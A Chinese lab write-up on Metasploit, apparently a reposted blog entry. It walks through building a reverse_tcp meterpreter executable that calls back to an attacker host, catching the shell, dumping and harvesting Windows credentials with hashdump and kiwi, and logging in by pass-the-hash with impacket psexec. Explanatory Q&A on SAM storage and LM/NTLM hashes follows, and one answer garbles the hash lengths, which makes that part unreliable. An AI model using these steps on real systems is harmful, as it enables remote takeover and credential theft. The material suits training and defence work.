msf渗透实验,抓取密钥及密钥生成原理所引发的问题

1、生成反向shell

msfvenom --list payloads		查看某个功能模块的具体功能msfvenom -p  windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.128 LPORT=12345 -f exe -o shell.exe		生成一个.exe的控制文件,反向连接的payload

2、接收shell,与反向shell建立连接

msfconsole	启动Metasploit,查看功能模块use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.224.143		反向连接谁
set lport 12345		反向连接的端口
exploit		//等待受害者连接

3、搭建http服务器,方便下载shell程序

python3 -m http.server 9999		搭载一个本地的web服务器,便于下载shell

注:下载前,请关闭防火墙,杀毒软件

4、连接成功后,进行操作

help        //可以查看,能进行的操作
getuid		//获取UID,查看权限
shell			//打开对方控制台
whoami		//查看当前用户
net user win10		//查看当前用户所属组
exit
hashdump			//抓取密文密码

5、可以试着进行抓取明文,可能不会成功

load kiwi
creds_all
ps		//查看进程
migrate shell当前进程号		//将shell程序迁移到system

6、思考题

6.1、windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文。

在windows中,一般是通过保存密码的hash值来确保安全性,Windows 默认使用NTLM或Kerberos 身份认证协议进行加密存储密码。

        密文存在的位置:SAM保留了计算机本地所有用户的凭证信息,可以理解为一个数据库。

c:\windows\system32\config\SAM

6.2、我们通过hashdump抓取所有用户的密文,分为两个模块,为什么?这两个模块分别都代表什么

hashdump模块:

        通过利用目标系统上的漏洞或提权后的权限,来读取系统内存种SAM数据并提取密码哈希值。它通常利用的原理通常是通过注入恶意代码到目标系统的内存中,或者利用系统漏洞来获取密码哈希值。

hashdump抓取的密文分为LMhash和NThash:

        LM Hash(LAN Manager Hash):微软为了提高windows操作系统的安全性而采用的散列加密算法,其本质是DES加密。尽管LM Hash较容易破解,但是为了保证系统的兼容性,windows只是将LM Hash禁用了,LM Hash明文密码被限制再14位以内,也就是说如果停止使用LM Hash,将用户的密码设置位14位以上就可以了。

        NTLM Hash:微软为了在提高安全性的同时保证兼容性而设计的散列加密算法,NTLMHash是基于MD4加密算法进行加密的。

为了保证系统的兼容性,windows只是将LM hash禁用了,但仍然会生成LM hash并且是固定值aad3b435b51404eeaad3b435b51404ee,所以在hashdump抓取结果可以看见两个密文模块。  

6.3、为什么第一个模块 永远是一样的aad3

因为LMhash容易被破解,为了保证系统的兼容性,Windows只是将LM Hash禁用了(从Windows Vista和Windows Server 2008版本开始,Windows操作系统默认禁用LM Hash),但仍然会生成LMhash并且是固定值aad3b435b51404eeaad3b435b51404ee

6.4、这两个模块的加密算法有什么不同,如何加密的

LM和NT都是使用hash算法加密,但LM是将明文转为16字节固定长度的hash值,而NTNTLM Hash 使用更复杂的算法和更长的哈希值来存储密码,通常是 32 个字符的长度

6.5、Windows10或Windows2012以上无法抓取明文密码,该怎么办?hash可以直接用来登录吗?

使用msf自带的mimikatz抓取密码,可以看到密码为null,说明这台pc已经打了微软的补丁,抓取不到明文密码了

但是用hash值也可以登录,hashdump后得到用户密码hash值,再用impacket工具中的横向渗透工具,比如psexec、smbexec等工具都支持使用hash值登录。这里使用psexec作为演示

psexec.py 登录的用户名@主机IP地址 -hashes 所获取的该用户名登录的密钥

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/829569.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【小迪安全2023】第59天:服务攻防-中间件安全CVE复现lSApacheTomcatNginx

【小迪安全2023】第59天:服务攻防-中间件安全CVE复现lSApacheTomcatNginx

🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~ ✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收…
阅读更多...
最短路(Dijkstra, Bellman-Ford, SPFA, Floyd)

最短路(Dijkstra, Bellman-Ford, SPFA, Floyd)

最短路 Dijkstra算法(复杂度 O ( m l o g n ) O(mlog n) O(mlogn)/ O ( n m l o g n ) O(nmlogn) O(nmlogn))–不能有负权边,不能有负权环,单源最短路径( O ( m l o g n ) O(mlog n) O(mlogn)),多源最短路径( O ( n m…
阅读更多...
python在Django中使用django-mptt库来实现无限级树结构非常直观和方便

python在Django中使用django-mptt库来实现无限级树结构非常直观和方便

在Django中使用django-mptt库来实现无限级树结构非常直观和方便。django-mptt(Modified Preorder Tree Traversal)是一个用于Django模型的树形结构字段的库,它允许你通过递归的方式轻松地构建和操作树形结构。 下面是一个使用django-mptt和MySQL数据库实现无限级树结构的基…
阅读更多...
hive创建hbase外部关联表实例

hive创建hbase外部关联表实例

在cdh6.3.2已经做好hbase和hive相关配置,这里不阐述。 要创建上述的表结构,你需要先在HBase中创建相应的表,然后在Hive中创建一个EXTERNAL TABLE来映射到这个HBase表。以下是详细的步骤: 步骤1:在HBase中创建表 确定…
阅读更多...
【javpower:后端技术革新的开源之旅】

【javpower:后端技术革新的开源之旅】

🌟 javpower:探索Java后端的无限可能 在Java技术的宇宙中,我以代码为舟,以创新为帆,不断探索后端开发的深邃与广阔。我是javpower,一名对技术充满热情的实践者,我的旅程是通过开源项目与世界分…
阅读更多...
k8s: 从私有仓库harbor获取镜像

k8s: 从私有仓库harbor获取镜像

一、根据私有仓库的用户名密码等信息创建secret kubectl create secret docker-registry my-registry-secret \ --docker-serverxxx.xxx.xxx.xxx \ --docker-usernameadmin \ --docker-passwordHarbor12345 \ --docker-emailxxxxsina.com二、在清单文件中使用imagePullSecrets…
阅读更多...
SQL dialect is not configured. Apache Cassandra matches best.没有配置SQL方言 如何处理

SQL dialect is not configured. Apache Cassandra matches best.没有配置SQL方言 如何处理

我这里是MySQL语言,所以我设置MySQL dialect 写个记录,之后更换全局SQL语言再换 下图是设置
阅读更多...
boot https ssl 使用http协议访问报错

boot https ssl 使用http协议访问报错

在springboot中配置ssl以后, 再次使用http访问对应的接口就会报错 可以考虑如下设置,将http访问的端口重定向到https对应的端口 import org.apache.catalina.Context; import org.apache.catalina.connector.Connector; import org.apache.tomcat.util…
阅读更多...
Qt——实现滚动条添加小组件自动跳转到最后

Qt——实现滚动条添加小组件自动跳转到最后

为了使滚动区域在您添加新的控件后自动滑动到底部,显示新增的窗口,您可以利用 Qt 的 QScrollArea 的滚动条进行调整。在您的 DWidget::toggleNewAdd 函数中,添加窗口到布局后,可以通过调整滚动区的滚动条到最大值来实现这一点。 …
阅读更多...
神经网络中多层卷积的作用

神经网络中多层卷积的作用

在神经网络中采用多层卷积的目的是为了逐步提取和组合图像的抽象特征,从而更有效地学习数据的表示并执行复杂的任务。不同层的卷积具有不同的作用,从较低层次的特征(例如边缘、纹理)到较高层次的抽象特征(例如物体部件…
阅读更多...
ZISUOJ 数据结构--串及其应用

ZISUOJ 数据结构--串及其应用

说明&#xff1a; 都是字符串的基本操作没啥好说的&#xff0c;直接上题目和代码了。 题目列表&#xff1a; 问题 A: 字符串翻转 参考题解&#xff1a; #include <iostream> #include <string> #include <algorithm> using std::cin; using std::cout; usi…
阅读更多...
【TensorFlow深度学习】张量比较与条件操作的应用场景

【TensorFlow深度学习】张量比较与条件操作的应用场景

张量比较与条件操作的应用场景 1. 张量比较操作1.1 常用张量比较函数1.1.1 相等比较1.1.2 不等于比较1.1.3 大于比较 1.2 张量比较的应用场景1.2.1 数据过滤1.2.2 激活函数1.2.3 损失函数1.2.4 条件训练 2. 条件操作2.1 常用条件操作函数2.1.1 tf.cond2.1.2 tf.where 2.2 条件操…
阅读更多...
OpenHarmony语言基础类库【@ohos.util.PlainArray (非线性容器PlainArray)】

OpenHarmony语言基础类库【@ohos.util.PlainArray (非线性容器PlainArray)】

PlainArray可用于存储具有关联关系的key-value键值对集合&#xff0c;存储元素中key值唯一&#xff0c;key值类型为number类型&#xff0c;每个key对应一个value。 PlainArray依据泛型定义&#xff0c;采用轻量级结构&#xff0c;集合中key值的查找依赖于二分查找算法&#xf…
阅读更多...
数字电路-可预置倒计时器Multisim仿真

数字电路-可预置倒计时器Multisim仿真

数字电路之于FPGA意义重大。本可预置倒计时器设计采用40106作为振荡电路&#xff0c;由74LSl92、74LS47D和七段共阴数码管构成计时电路&#xff0c;具有启动/预置、暂停/继续计时和报警功能。紫色文字是超链接&#xff0c;点击自动跳转至相关博文。持续更新&#xff0c;原创不易…
阅读更多...
OceanBase 分布式数据库【信创/国产化】- OceanBase 与 MySql 兼容性对比

OceanBase 分布式数据库【信创/国产化】- OceanBase 与 MySql 兼容性对比

本心、输入输出、结果 文章目录 OceanBase 分布式数据库【信创/国产化】- OceanBase 与 MySql 兼容性对比前言OceanBase 数据更新架构OceanBase 与 MySql 兼容性对比OceanBase 数据类型SQL 语法过程性语言OceanBase 支持的字符集OceanBase 存储引擎OceanBase 分区支持OceanBase…
阅读更多...
用C实现通讯录(详细讲解+源码)

用C实现通讯录(详细讲解+源码)

前言 &#x1f4da;作者简介&#xff1a;爱编程的小马&#xff0c;正在学习C/C&#xff0c;Linux及MySQL.. &#x1f4da;以后会将数据结构收录为一个系列&#xff0c;敬请期待 ● 本期内容会给大家带来通讯录的讲解&#xff0c;主要是利用结构体来实现通讯录&#xff0c;该通讯…
阅读更多...
[ESP32]:TFLite Micro推理CIFAR10模型

[ESP32]:TFLite Micro推理CIFAR10模型

[ESP32]&#xff1a;TFLite Micro推理CIFAR10模型 模型训练 数据集处理 from keras.datasets import cifar10 from keras.preprocessing.image import ImageDataGenerator from keras.models import Sequential, load_model, Model from keras.layers import Input, Dense, …
阅读更多...
目标检测(任务概述、机器学习时代的方法、深度学习时代的目标检测模型)

目标检测(任务概述、机器学习时代的方法、深度学习时代的目标检测模型)

文章目录 目标检测任务概述机器学习时代的目标检测方法深度学习时代的目标检测模型基于提议的目标检测模型R-CNN 模型Fast RCNN 模型Faster RCNN 模型SSD 模型YOLO 模型 基于分割的目标检测模型FCN 模型U-Net 模型 目标检测任务概述 目标检测任务的概念&#xff1a;尝试从一张…
阅读更多...
xLua详解

xLua详解

目录 环境准备xLua导入 C#调用LuaLua解析器Lua文件加载重定向Lua解析管理器全局变量的获取全局函数的获取List和Dictionary映射table类映射table接口映射tableLuaTable映射table Lua调用C#准备工作Lua使用C#类Lua调用C#枚举Lua使用C# 数组 List 字典数组List字典 Lua使用C#扩展…
阅读更多...
解决NetworkManager覆盖/etc/resolv.conf的问题

解决NetworkManager覆盖/etc/resolv.conf的问题

发布时间&#xff1a;2024.4.27 问题 /etc/resolv.conf是Linux下DNS的配置文件。 但是NetworkManager会用覆盖它&#xff0c;导致我们每次都要重新配置。 解决办法 这是官方推荐的做法。或者你可以用resolveconf工具。 $ nm-connection-editor会调起一个界面&#xff0c;…
阅读更多...
最新文章

Copyright @ 2022~2023